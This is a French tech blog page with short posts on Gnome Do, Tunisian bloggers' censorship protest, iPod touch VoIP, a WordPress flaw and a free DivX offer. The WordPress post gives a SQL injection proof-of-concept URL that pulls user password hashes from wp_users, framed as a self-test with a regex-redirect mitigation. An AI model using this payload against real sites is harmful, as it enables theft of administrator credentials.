Aller au contenu
Korben, roi d’internet, logo bébé avec des lunettes en mode thug life

Capture d'écran de Gnome Do, un lanceur d'applications pour Ubuntu

Je vous ai déjà parlé d’un logiciel similaire pour Windows qui s’appelle Launchy. Gnome Do en est fortement inspiré (même principe que Quicksilver pour Mac) et permet de donner accès immédiatement aux favoris, applications et outils de config d’Ubuntu. Il supporte aussi plusieurs plugins dont certains permettent de tchatter ou d’écouter de la musique.

Et parce qu’une tchite vidéo vaut mieux qu’un long post :

Bref, un petit outil vraiment pratique pour tout avoir à porté de main simplement en jouant avec la barre espace. Si ça vous tente, Gnome Do est téléchargeable ici.


Bloggeurs tunisiens manifestant contre la censure

Le 25 décembre, c’est Noël mais c’est aussi pour nos amis bloggeurs Tunisiens l’occasion de protester contre la censure dans leur pays. Il devront ce jour là publier un post blanc en signe de protestation.

Très bonne initiative !

Merci à Gilles pour l’info. Plus d’info ici.


iPod touch avec application VoIP

[Edit 11/12 : Les captures écrans sont ici ! Ca fonctionne même si c’est encore en ligne de commande]

Je vous avais parlé de la fonction micro sur l’ipod touch il n’y a pas si longtemps que ça. Et bien sachez qu’un hacker a porté sur l’ipod touch, SvSIP, le système de VoIP de Samuel qui fonctionne déjà sur Nintendo DS et qui permet de passer des appels via le protocole SIP grâce au Wifi.

On n’a pas encore les captures écrans, mais ça ne devrait pas tarder… ça chauffe, ça chauffe…

12:57:57.091 pjsua_app.c Call 0 state changed to INCOMING
12:57:57.092 pjsua_app.c Incoming call for account 0!
From: « Cxxxxxxx Txxxx » [email protected]>
To: [email protected]>
Press a to answer or h to reject call

You have 1 active call

C’est la fête en ce moment !


capture d'écran du tableau de bord WordPress

[Edit: Apparement, ils ont rétrogradé la gravité de la faille car ils n’ont pas été capable de trouver un POC qui fasse vraiment mal… Donc c’est une  faille qualifiée de « Information Disclosure » qui en fait peut donner des informations sur votre système sans directement le mettre en danger… Enfin, patcher ça ne coute rien et c’est plus prudent quand même…]

J’ai vu ça sur le site de BlogSecurity. Une faille encore non patchée traine dans WordPress et permettrait à un pirate de se faire votre blog sans aucun souci…

Pour savoir si votre WordPress est faillible (et il l’est surement), il suffit de tester avec le POC suivant (Proof of Concept) :

http://www.mon_blog.com/?feed=rss2&p=11/**/union/**/select/**/concat(user_password,char(100),username),2/**/from/**/wp_users**/where/**user_id=1/*

Et si ça vous répond un truc du genre :

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘AND comment_approved = ‘1’ ORDER BY comment_date_gmt DESC LIMIT 30′ at line 1]
SELECT wp_comments.* FROM wp_comments WHERE comment_post_ID = AND comment_approved = ‘1’ ORDER BY comment_date_gmt DESC LIMIT 30
Upgrade your mind Mon, 10 Dec 2007 21:47:53 +0000 http://wordpress.org/?v=2.3.1

Ca veut dire que vous l’avez dans le baba… Pour éviter le drame, une seule solution que j’ai trouvé sur le blog de Ghusse, c’est d’installer le plugin Redirection et de faire les 2 redirections suivantes en cochant bien la case Regexp (moi j’ai fais les redirection vers une page aléatoire de mon site) :

  • .*feed=.*p=.*
  • .*p=.*feed=.*

Ca vous protégera le temps que sorte la mise à jour de WordPress. Encore merci à Ghusse qui je le sais, passe quelque-fois ici.


Capture d'écran du site de téléchargement de DivX Pro 6.8

C’est Koreus qui a balancé l’info sur son Twitter, et je m’en empare comme le petit scarabée sub-aquatomique que je suis. DivX vous propose pendant toute la période des fêtes de télécharger gratuitement la version Pro de leur célèbre logiciel d’encodage DivX 6.8.
Ca se passe par ici ! Merci Koreus !